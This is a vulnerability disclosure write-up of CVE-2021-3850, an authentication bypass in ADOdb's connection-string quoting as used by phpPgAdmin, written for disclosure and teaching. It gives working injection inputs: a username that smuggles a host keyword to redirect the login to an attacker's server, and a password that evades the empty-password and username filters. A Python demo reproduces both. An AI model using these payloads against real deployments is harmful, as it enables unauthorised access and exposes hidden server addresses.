Auth Bypass in ADOdb CVE-2021-3850
I first decided to look at phpPgAdmin after reading this blog post that someone wrote up about abusing it to get a bug bounty. After reading through the source I discovered a bug in ADOdb, the database abstraction library phpPgAdmin uses to talk to Postgres.
When a user logs in, the username and password are run through this function before being placed into the Postgres connection string:
```php
function adodb_addslashes($s)
{
	$len = strlen($s);
	if ($len == 0) return "''";
	// The bug: a value that starts and ends with a single quote is trusted as
	// "already quoted" and returned verbatim, so nothing inside it is escaped
	if (strncmp($s,"'",1) === 0 && substr($s,$len-1) == "'") return $s; // already quoted
	return "'".addslashes($s)."'";
}
```
The "already quoted" check only looks at the first and last character, so any attacker-controlled value wrapped in single quotes skips `addslashes()` entirely and can carry extra `key='value'` pairs. If I log in with the username
```
'testinguser' host='1.3.3.7'
```
the connection string becomes
```
port=5432 user='testinguser' host='1.3.3.7' password='gfafas' dbname='template1'
```
This means we can point the panel at a Postgres server we control and log in to it, getting past the login page before exploiting other bugs in the phpPgAdmin panel. Because the victim's web server makes an outbound connection to whatever host we supply, it can also reveal the backend IP of a server that sits behind caching or DDoS protection.
Another impact is that it can be used to bypass the weak username and password filters that phpPgAdmin implements:
```php
$bad_usernames = array('pgsql', 'postgres', 'root', 'administrator');
$username = strtolower($server_info['username']);
// Checks the raw form values, not what ends up in the connection string
if ($server_info['password'] == '' || in_array($username, $bad_usernames)) {
	unset($_SESSION['webdbLogin'][$_REQUEST['server']]);
	$msg = $lang['strlogindisallowed'];
	include('./login.php');
	exit;
}
```
If I supply
```
'' lol=''
```
as the password, I pass the empty-password check (the form value is not an empty string), but in the connection string my password is effectively empty: it becomes `password='' lol=''`. The same applies to the username checks, since a quoted username is compared against the blacklist with its quotes still attached.
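To make both bypasses concrete, here is an added Python example; it is not ADOdb or phpPgAdmin code. It ports the quoting routine above in its vulnerable form and in the form the Patching section describes, ports the phpPgAdmin filter, builds a connection string in the shape shown above (the shape is assumed from this post, ADOdb's real builder is not reproduced), and parses it with a small libpq-style `keyword=value` parser so the values the panel checks can be compared with the values the database actually receives. The parser, `build_conninfo()`, the password `hunter2` and the `'postgres'` username case are this example's own constructions.

```python
# Constructed demo of CVE-2021-3850. The two quoting routines are Python ports
# of the PHP shown above; the conninfo parser, build_conninfo() and the login
# check are this example's own, not ADOdb or phpPgAdmin code.

BAD_USERNAMES = ("pgsql", "postgres", "root", "administrator")

def php_addslashes(s: str) -> str:
    """Port of PHP addslashes(): backslash-escapes ' " \\ and NUL."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\x00", "\\0"))

def adodb_addslashes_vulnerable(s: str) -> str:
    """Port of the pre-fix adodb_addslashes() quoted above."""
    if len(s) == 0:
        return "''"
    if s[0] == "'" and s[-1] == "'":
        return s  # "already quoted": returned verbatim, nothing escaped
    return "'" + php_addslashes(s) + "'"

def adodb_addslashes_fixed(s: str) -> str:
    """Same routine with the 'already quoted' shortcut removed (the fix)."""
    if len(s) == 0:
        return "''"
    return "'" + php_addslashes(s) + "'"

def phppgadmin_login_allowed(username: str, password: str) -> bool:
    """Port of the phpPgAdmin filter quoted above; it inspects the raw form
    values, not what ends up in the connection string."""
    return not (password == "" or username.lower() in BAD_USERNAMES)

def build_conninfo(username, password, dbname, quote, port=5432):
    """Assumed connection-string shape, copied from the post (no host is
    configured, so none is emitted); ADOdb's real builder is not reproduced."""
    return (f"port={port} user={quote(username)} "
            f"password={quote(password)} dbname={quote(dbname)}")

def parse_conninfo(conninfo: str) -> dict:
    """Minimal libpq-style keyword=value parser: values are bare tokens or
    single-quoted with backslash escapes; a repeated keyword's last value wins."""
    opts, i, n = {}, 0, len(conninfo)
    while i < n:
        if conninfo[i].isspace():
            i += 1
            continue
        start = i
        while i < n and conninfo[i] != "=" and not conninfo[i].isspace():
            i += 1
        key = conninfo[start:i]
        while i < n and conninfo[i].isspace():
            i += 1
        if i >= n or conninfo[i] != "=":
            raise ValueError(f"missing '=' after {key!r}")
        i += 1
        while i < n and conninfo[i].isspace():
            i += 1
        if i < n and conninfo[i] == "'":
            i, buf = i + 1, []
            while True:
                if i >= n:
                    raise ValueError("unterminated quoted value")
                c = conninfo[i]
                i += 1
                if c == "\\":
                    if i >= n:
                        raise ValueError("dangling backslash")
                    buf.append(conninfo[i])
                    i += 1
                elif c == "'":
                    break
                else:
                    buf.append(c)
            opts[key] = "".join(buf)
        else:
            start = i
            while i < n and not conninfo[i].isspace():
                i += 1
            opts[key] = conninfo[start:i]
    return opts

def effective_connection(username, password, dbname, quote):
    """What the panel's filter decides vs. what libpq would actually see."""
    allowed = phppgadmin_login_allowed(username, password)
    conninfo = build_conninfo(username, password, dbname, quote)
    return allowed, conninfo, parse_conninfo(conninfo)

if __name__ == "__main__":
    cases = [  # constructed attacker inputs, following the post
        ("'testinguser' host='1.3.3.7'", "gfafas"),  # host injection
        ("attacker", "'' lol=''"),                   # empty-password bypass
        ("'postgres'", "hunter2"),                   # bad-username bypass
    ]
    for user, pw in cases:
        for name, q in (("vulnerable", adodb_addslashes_vulnerable),
                        ("fixed", adodb_addslashes_fixed)):
            allowed, conninfo, opts = effective_connection(user, pw, "template1", q)
            print(f"[{name}] filter allows={allowed}  {conninfo}")
            print(f"            libpq sees user={opts['user']!r} "
                  f"password={opts['password']!r} host={opts.get('host')!r}")
```

With the vulnerable routine the host-injection username reproduces the exact connection string shown above and the parser reports `host=1.3.3.7`; the `'' lol=''` password passes the filter but parses to an empty password; and `'postgres'` sails past the blacklist yet connects as `postgres`. With the shortcut removed, each of those values is escaped into a single literal `user` or `password` value and no extra keyword appears.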
I also explored adding other options to the Postgres connection string but was not able to find anything interesting.
Patching
After reporting the issue on Huntr.dev, Damien Regad (one of the ADOdb maintainers) responded and produced a patch. As described in the advisory, the simplest fix is removing the "already quoted" shortcut, so that every value is escaped and wrapped in quotes:
```php
if (strncmp($s,"'",1) === 0 && substr($s,$len-1) == "'") return $s; // already quoted
```
Coming Soon
We did find more security issues in phpPgAdmin, but these are still awaiting a response from the project and will be released at some point in the future.
Timeline
| Date | Action |
|---|---|
| 28/10/2021 | Reported ADOdb bug on Huntr.dev |
| 14/01/2022 | Patch and advisory released |
| 26/01/2022 | This blog post released |